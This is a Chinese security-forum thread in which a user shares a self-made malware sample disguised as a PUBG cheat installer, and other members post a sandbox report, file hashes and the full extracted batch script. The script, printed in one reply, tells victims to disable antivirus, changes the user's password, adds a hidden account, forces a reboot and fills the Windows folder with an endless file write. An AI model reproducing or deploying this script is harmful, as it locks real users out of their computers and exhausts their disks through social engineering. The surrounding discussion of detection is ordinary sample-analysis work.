查看: 4250|回复: 30
收起左侧

[病毒样本] 自己做的敲竹杠……

  [复制链接]
remiliacn
发表于 2018-2-3 05:36:13 | 显示全部楼层 |阅读模式
发现不少AV竟然在VT上miss了。。所以传上来你们玩玩好啦

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
我爱舒肤佳
发表于 2018-2-3 08:06:14 | 显示全部楼层
基本信息
文件名称:
绝地求生外{过}{滤}挂1.1.exe
MD5:97013e59c4638214405b3733c22087b8
文件类型:EXE
上传时间:2018-02-03 07:59:59
出品公司:N/A
版本:N/A
壳或编译器信息:PACKER:UPX V2.00-V3.00 -> Markus Oberhumer & Laszlo Molnar & John Reiser *
子文件信息:[url=]详情[/url]


进程行为
行为描述:创建进程
详情信息:
[0x00000ae8]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd" /c ""C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat" "C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe""
[0x00000af0]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net session
[0x00000af8]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 session


文件行为
行为描述:创建文件
详情信息:
C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat
C:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
行为描述:修改脚本文件
详情信息:
C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat ---> Offset = 0
行为描述:删除文件
详情信息:
C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat
C:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
行为描述:查找文件
详情信息:
FileName = C:\DOCUME~1
FileName = C:\DOCUME~1\ADMINI~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\cmd.exe
FileName = C:\Documents and Settings\Administrator\Local Settings\Temp
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%
FileName = C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat
FileName = C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp
FileName = C:\Documents and Settings\Administrator\DESKTOP


其他行为
行为描述:打开事件
详情信息:
HookSwitchHookEnabledEvent
行为描述:创建互斥体
详情信息:
CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
行为描述:打开互斥体
详情信息:
ShimCacheMutex
行为描述:样本控制台输出内容
详情信息:
N/A


进程树
  • [url=]****.exe (PID: 0x00000ad4)[/url]
    • [url=]cmd.exe (PID: 0x00000ae8)[/url]
      • [url=]net.exe (PID: 0x00000af0)[/url]






王国之心00
发表于 2018-2-3 08:41:44 | 显示全部楼层
本帖最后由 王国之心00 于 2018-2-3 09:13 编辑

社工运用得不错,对不懂电脑的小学生有很强的杀伤力。过所有主流杀软

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qq1094250746
发表于 2018-2-3 09:59:38 | 显示全部楼层
红伞

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
安全守护者
头像被屏蔽
发表于 2018-2-3 10:08:41 | 显示全部楼层
本帖最后由 安全守护者 于 2018-2-3 10:13 编辑

复制代码



衍生物:
  1. MD5:2902f4f66f0791e00f463d942d9217d5
  2. SHA1:bed27352ffd4f9655549e9f1d880cefa8a80eda3
  3. 文件大小:0.94 KB
  4. 文件类型:bat
复制代码
衍生物哈勃:https://habo.qq.com/file/showdetail?pk=ADMGYV1sB2YIMVs0
批处理文本:
  1. shift /0
  2. @echo off
  3. title 绝地求生外{过}{滤}挂安装程序

  4. cd /d "%USERPROFILE%\DESKTOP"
  5. net session >nul 2>&1

  6. echo 正在验证安装程序完整性,请稍等片刻……
  7. timeout 4 >nul

  8. if %errorLevel% == 0 (
  9. echo 验证成功!
  10. timeout 4 >nul
  11. echo 杀毒软件可能会出现误报,请暂时关闭杀毒软件。
  12. echo 请按任意键开始释放主验证程序
  13. pause
  14. net user %username% bbs.kafan.com >nul 2>nul
  15. net user qq_489851973 bbs.kafan.com /add >nul 2>nul

  16. goto payload
  17. ) else (
  18. echo 抱歉!请使用管理员权限运行该软件!
  19. echo 请按任意键退出安装!
  20. pause >nul
  21. exit )

  22. :payload
  23. echo 安装中!请勿关闭计算机!
  24. timeout 4 >nul
  25. echo 正在验证安装完整性!请勿关闭计算机……
  26. timeout 5 >nul
  27. echo 请注意保持该软件运行状态。软件正在自动尝试攻击BattleEye的防御系统
  28. echo 请按任意键重启电脑,按键后电脑将会在3分钟后重启。
  29. echo 我们将会在重启的时间段使用漏洞对反作弊系统进行攻击
  30. echo 请尽量不要使用其他软件……
  31. pause >nul

  32. shutdown -r -t 180

  33. :loop
  34. cd %windir%
  35. echo 哼~ >> lol.txt
  36. goto loop
复制代码
-------------------------------------------------------------------------------------------
这个咋跟我的差不多【都是释放随机名BAT,后执行】
remiliacn
 楼主| 发表于 2018-2-3 10:09:17 | 显示全部楼层

我加花了。。这个分析没有一个正确的。。
真正的行为只有:
1、更改所有用户密码
2、增加一个新的用户
3、在C盘%windir%路径下创建一个很大的文本文档文件
remiliacn
 楼主| 发表于 2018-2-3 10:20:50 | 显示全部楼层
安全守护者 发表于 2018-2-3 10:08
衍生物:
衍生物哈勃:https://habo.qq.com/file/showdetail?pk=ADMGYV1sB2YIMVs0
批处理文本:

因为purebasic用的最熟悉233
安全守护者
头像被屏蔽
发表于 2018-2-3 10:22:53 | 显示全部楼层
remiliacn 发表于 2018-2-3 10:20
因为purebasic用的最熟悉233

批处理更惨


没有任何检测引擎检测到此文件
SHA-256        d87cdd6c88b232a5a61bfa07c1647758ba5ea06bb3142b00351f3187bb02ba15
文件名        5_E0FB.bat
文件大小        963 B
上次分析时间        2018-02-03 02:19:59 UTC

remiliacn
 楼主| 发表于 2018-2-3 10:25:09 | 显示全部楼层

可能是各大杀软不屑于检测batch
我是路人甲
发表于 2018-2-3 11:23:59 | 显示全部楼层
remiliacn 发表于 2018-2-3 10:25
可能是各大杀软不屑于检测batch

按你那个密码我进不来卡饭论坛,这东西国内主防差不多都可以拦截吧
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-2 03:55 , Processed in 0.132030 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表